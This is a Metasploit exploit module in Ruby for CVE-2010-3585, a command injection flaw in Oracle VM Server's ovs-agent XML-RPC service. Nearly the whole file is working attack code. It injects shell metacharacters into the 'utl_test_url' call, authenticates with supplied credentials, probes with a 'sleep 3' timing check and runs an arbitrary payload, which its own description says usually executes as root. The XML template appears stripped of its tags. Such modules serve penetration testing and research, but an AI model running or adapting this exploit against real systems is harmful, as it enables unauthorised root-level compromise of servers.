## # $Id: oracle_vm_agent_utl.rb 10821 2010-10-25 20:58:49Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Oracle VM Server Virtual Server Agent Command Injection', 'Description' => %q{ This module exploits a command injection flaw within Oracle\'s VM Server Virtual Server Agent (ovs-agent) service. By including shell meta characters within the second parameter to the 'utl_test_url' XML-RPC methodCall, an attacker can execute arbitrary commands. The service typically runs with root privileges. NOTE: Valid credentials are required to trigger this vulnerable. The username appears to be hardcoded as 'oracle', but the password is set by the administrator at installation time. }, 'Author' => [ 'jduck' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 10821 $', 'References' => [ # ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585} ['CVE', '2010-3585'], ['OSVDB', '68797'], ['BID', '44047'] ], 'Privileged' => true, 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 512, 'BadChars' => '<>', 'DisableNops' => true, 'Keys' => ['cmd', 'cmd_bash'], }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 12 2010' )) register_options( [ Opt::RPORT(8899), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('CMD', [ false, "A single command to execute instead of the payload" ]), OptString.new('USERNAME', [ true, "The user to authenticate as", 'oracle']), OptString.new('PASSWORD', [ true, "The password to authenticate with" ]) ], self.class) deregister_options( 'HTTP::junk_params', # not your typical POST, so don't inject params. 'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now. ) end def go(command) datastore['BasicAuthUser'] = datastore['USERNAME'] datastore['BasicAuthPass'] = datastore['PASSWORD'] xml = <<-EOS utl_test_url PARAM1 PARAM2 PARAM3 PARAM4 EOS sploit = rand_text_alphanumeric(rand(128)+32) sploit << "';" + command + ";'" xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/') xml.gsub!(/PARAM2/, sploit) xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32)) xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32)) res = send_request_cgi( { 'uri' => '/RPC2', 'method' => 'POST', 'ctype' => 'application/xml', 'data' => xml, }, 5) if not res if not session_created? print_error('Unable to complete XML-RPC request') return nil end # no response, but session created!!! return true end case res.code when 403 print_error('Authentication failed!') return nil when 200 print_good('Our request was accepted!') return res end print_error("Encountered unexpected #{res.code} reponse:") print_error(res.inspect) return nil end def check print_status("Attempting to detect if the server is vulnerable...") # Try running/timing sleep 3 start = Time.now go('sleep 3') elapsed = Time.now - start if elapsed >= 3 and elapsed <= 4 return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit print_status("Attempting to execute the payload...") cmd = datastore['CMD'] cmd ||= payload.encoded if not go(cmd) raise RuntimeError, "Unable to execute the desired command" end handler end end